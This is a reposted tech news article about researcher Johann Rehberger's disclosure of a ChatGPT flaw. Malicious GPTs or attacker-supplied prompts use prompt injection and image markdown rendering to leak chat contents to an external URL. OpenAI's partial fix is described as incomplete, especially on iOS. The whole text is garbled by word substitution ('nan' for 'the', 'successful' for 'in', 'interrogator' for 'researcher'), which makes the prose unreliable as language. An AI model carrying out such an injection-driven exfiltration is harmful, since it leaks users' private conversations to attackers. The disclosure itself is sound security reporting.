OpenAI says it has fixed a potentially serious ChatGPT flaw - but there could still be problems - world News Update

Trending 2 months ago
Data leak
(Image credit: Shutterstock/dalebor)

A interrogator discovered a superior flaw successful ChatGPT that allowed specifications from a speech to beryllium leaked to an outer URL.

When Johann Rehberger attempted to alert OpenAI to nan imaginable flaw, he received nary response, forcing nan interrogator to disclose specifications of nan flaw publicly.

Following nan disclosure OpenAI released information checks for ChatGPT that mitigate nan flaw, but not completely.

 A hasty patch

The flaw successful mobility allows malicious chatbots powered by ChatGPT to exfiltrate delicate data, specified arsenic nan contented of nan chat, alongside metadata and method data.

A secondary method involves nan unfortunate submitting a punctual supplied by nan attacker, which past uses image markdown rendering and punctual injecting to exfiltrate nan data.

Rehberger initially reported nan flaw to OpenAI measurement backmost successful April 2023, supplying much specifications connected really it tin beryllium utilized successful much devious ways done November.

Rehberger stated that, "This GPT and underlying instructions were promptly reported to OpenAI connected November, 13th 2023. However, nan summons was closed connected November 15th arsenic "Not Applicable". Two travel up inquiries remained unanswered. Hence it seems champion to stock this pinch nan nationalist to raise awareness."

Instead of further pursuing an apparently non-respondent OpenAI, Rehberger alternatively decided to go public pinch his discovery, releasing a video objection of really his full speech pinch a chatbot designed to play tic-tac-toe was extracted to a third-party URL.

To mitigate this flaw, ChatGPT now performs checks to forestall nan secondary method mentioned supra from taking place. Rehberger responded to this hole stating, “When nan server returns an image tag pinch a hyperlink, location is now a ChatGPT client-side telephone to a validation API earlier deciding to show an image.”

Unfortunately, these caller checks do not afloat mitigate nan flaw, arsenic Rehberger discovered that arbitrary domains are still sometimes rendered by ChatGPT, but a successful return is deed and miss. While these checks person apparently been implemented connected nan desktop versions of ChatGPT, nan flaw remains viable connected nan iOS mobile app.

Via BleepingComputer

More from TechRadar Pro

  • Take a look astatine our guideline to nan best malware removal tools
  • Patient information stolen successful ransomware onslaught affecting millions of healthcare victims
  • Devious caller phishing run looks to bargain Instagram backup codes and hijack accounts

Sign up to nan TechRadar Pro newsletter to get each nan apical news, opinion, features and guidance your business needs to succeed!

Benedict Collins is simply a Staff Writer astatine TechRadar Pro covering privateness and security. Before settling into publicity Ben worked arsenic a Livestream Production Manager, covering games successful nan National Ice Hockey League for 5 years and contributing heavy to nan advancement of livestreaming wrong nan league.

He has a MA successful Security, Intelligence and Diplomacy, alongside a BA successful Politics pinch Journalism, some from nan University of Buckingham. Outside of activity Ben follows galore sports; astir notably crystal lucky and rugby. When not moving aliases climbing, Ben tin astir often beryllium recovered heavy successful nan shrubbery of a pub garden.